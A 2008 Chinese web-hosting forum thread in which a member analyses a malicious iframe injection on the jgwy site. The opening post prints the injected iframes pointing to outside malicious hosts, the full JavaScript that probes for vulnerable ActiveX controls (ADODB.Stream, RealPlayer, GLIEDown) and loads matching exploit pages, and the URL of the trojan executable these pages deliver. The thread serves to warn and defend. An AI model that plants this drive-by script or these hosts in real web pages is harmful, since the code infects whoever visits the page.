找回密码
 注册
【阿里云】2核2G云新老同享 99元/年,续费同价华为云精选云产品特惠做网站就用糖果主机Jtti,新加坡服务器,美国服务器,香港服务器
查看: 7113|回复: 20

jgwy被挂网马相关分析

[复制链接]
发表于 2008 年 6 月 24 日 19:42:52 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×
因为来晚了 没有第一时间获知 挂马方式未知,但从贴内大家找出的地址来看 分析如下:

<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe>

cn4.htm引出<iframe src=http://s82mnl12.cn/xi/xx.htm width=50 height=0></iframe>
低部为统计流量
而xx.htm未使用任何加密方式 明文显示
  1. <script language="javaScript">
  2.         var cook = "silentwm";
  3.        
  4.         function setCookie(name, value, expire)
  5.         {   
  6.                 window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
  7.         }

  8.         function getCookie(Name)
  9.         {   
  10.                 var search = Name + "=";
  11.                 if (window.document.cookie.length > 0)
  12.                 {
  13.                         offset = window.document.cookie.indexOf(search);
  14.                         if (offset != -1)
  15.                         {
  16.                                 offset += search.length;      
  17.                           end = window.document.cookie.indexOf(";", offset)      
  18.                           if (end == -1)
  19.                             end = window.document.cookie.length;
  20.                           return unescape(window.document.cookie.substring(offset, end));
  21.                          }
  22.                  }
  23.           return null;
  24.         }

  25.         function register(name)
  26.         {
  27.                 var today = new Date();
  28.                 var expires = new Date();
  29.                 expires.setTime(today.getTime() + 1000*60*60*24);
  30.                 setCookie(cook, name, expires);
  31.         }

  32.         function openWM()
  33.         {
  34.                 var c = getCookie(cook);
  35.                 if (c != null)
  36.                 {
  37.                   return;
  38.                 }
  39.                
  40.                 register(cook);
  41.                
  42.                 window.defaultStatus="完成";
  43.                        
  44.                 try{ var e;
  45.                         var ado=(document.createElement("object"));
  46.                         ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  47.                         var as=ado.createobject("Adodb.Stream","")}
  48.                 catch(e){};
  49.                 finally{
  50.                         if(e!="[object Error]"){
  51.                                 document.write("<iframe width=50 height=0 src=so.htm></iframe>")}
  52.                         else
  53.                         {       
  54.                                 try{ var j;
  55.                                         var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
  56.                                 catch(j){};
  57.                                 finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
  58.                                         {document.write('<iframe width=0 height=100 src=sr.htm></iframe>')}
  59.                          else
  60.                          {
  61.                                         document.write('<iframe width=0 height=100 src=st.htm></iframe>')}}}

  62.                                 try{ var g;
  63.                                         var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
  64.                                 catch(g){};
  65.                                 finally{if(g!="[object Error]"){
  66.                                         document.write('<iframe style=display:none src=sz.htm></iframe>')}}


  67.                         }}
  68.         }

  69. openWM();
  70. </script>
  71. <iframe src=http://8nnnnn99.cn/9/sf.htm width=100 height=0></iframe>
  72. <script src='http://s127.cnzz.com/stat.php?id=755932&web_id=755932' language='JavaScript' charset='gb2312'></script>
复制代码
以上为自动判断式组合网马
so.htm
sr.htm
st.htm
sz.htm
sf.htm
4文件已加密 过杀毒
解密其文件,得到木马地址:http://8nnnnn99.cn/9/ck.exe 慎下
文件大小15.9K
使用多重加壳方式 内带Morphine壳 常用于加密rootkit内核病毒
该病毒行为插入explorer.exe
带EXE感染性质
写目录为C:\Program Files\HintSoft\PubwinClient\Patch
生成C:\Program Files\360Safebox\sprotect.ini
故疑为机器狗病毒
大家小心

评分

参与人数 1兑换券 +50 收起 理由
esnak + 50

查看全部评分

Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
发表于 2008 年 6 月 24 日 19:49:41 | 显示全部楼层
【腾讯云】2核2G云服务器新老同享 99元/年,续费同价
很好我有卡吧
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

 楼主| 发表于 2008 年 6 月 24 日 19:52:15 | 显示全部楼层
这个病毒应该是老版 新版能过卡巴主动防御
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

 楼主| 发表于 2008 年 6 月 24 日 19:55:39 | 显示全部楼层

Discuz! 6.0脚本目前无最新漏洞情况
安全原因还是要多从服务器入手
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

发表于 2008 年 6 月 24 日 19:57:52 | 显示全部楼层
昨天网站挂了一次,今天又挂了一次
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

发表于 2008 年 6 月 24 日 20:07:13 | 显示全部楼层
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

发表于 2008 年 6 月 24 日 20:31:41 | 显示全部楼层
【腾讯云】2核2G云服务器新老同享 99元/年,续费同价
呵这都让你分析出来了 不简单呵
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

发表于 2008 年 6 月 24 日 20:34:43 | 显示全部楼层
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

发表于 2008 年 6 月 24 日 20:38:20 | 显示全部楼层
偶像级别啊,这玩意都能弄出来,强~
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

发表于 2008 年 6 月 24 日 21:51:14 | 显示全部楼层
或者是管理层密码泄露  上次DZ 官方被黑好像就是管理层密码泄露  

支持HTML 怎么的加的。。。。
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|金光论坛

GMT+8, 2024 年 11 月 16 日 16:56 , Processed in 0.021254 second(s), 22 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表